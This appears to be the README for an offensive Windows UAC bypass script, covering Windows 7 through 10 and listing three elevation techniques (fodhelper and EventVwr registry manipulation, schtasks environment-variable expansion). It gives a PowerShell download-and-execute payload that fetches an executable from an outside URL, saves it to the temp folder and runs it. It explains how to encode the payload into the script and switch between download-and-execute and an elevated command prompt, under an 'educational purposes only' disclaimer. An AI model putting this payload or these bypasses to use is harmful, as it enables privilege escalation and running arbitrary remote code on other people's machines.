Should work from Windows 7 to Latest Windows 10 FCU (Also works if UAC is Set on High/Always Notify)

Coded by Joel A. Ossi

For the powershell code in the UAC bypass you can use https://raikia.com/tool-powershell-encoder/

and payload: (new-object System.Net.WebClient).DownloadFile('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe', $env:TEMP + '\putty.exe');Start-Process($env:TEMP + '\putty.exe');

replace YOURCODEHERE in the python file with the encoded output.

you can seet ENABLE_DOWNLOADER to 0 or 1 if you wish to make it Download & Execute or just open Elevated CMD.

Note: all exploits in the python file need the current user to be in Administrators group in order to take advantage of the vulnerability.

Please do not abuse this script, I uploaded this for Educational Purposes Only!

SPECIAL THANKS & EXPLOITS

Type: Shell API
Method: Registry key manipulation
Target(s): \system32\fodhelper.exe
Thanks to: winscripting.blog

Type: Shell API
Method: Environment variables expansion
Target(s): \system32\svchost.exe via \system32\schtasks.exe
Thanks to: James Forshaw

Type: Shell API
Method: Registry key manipulation
Target(s): \system32\EventVwr.exe
Thanks to: Enigma0x3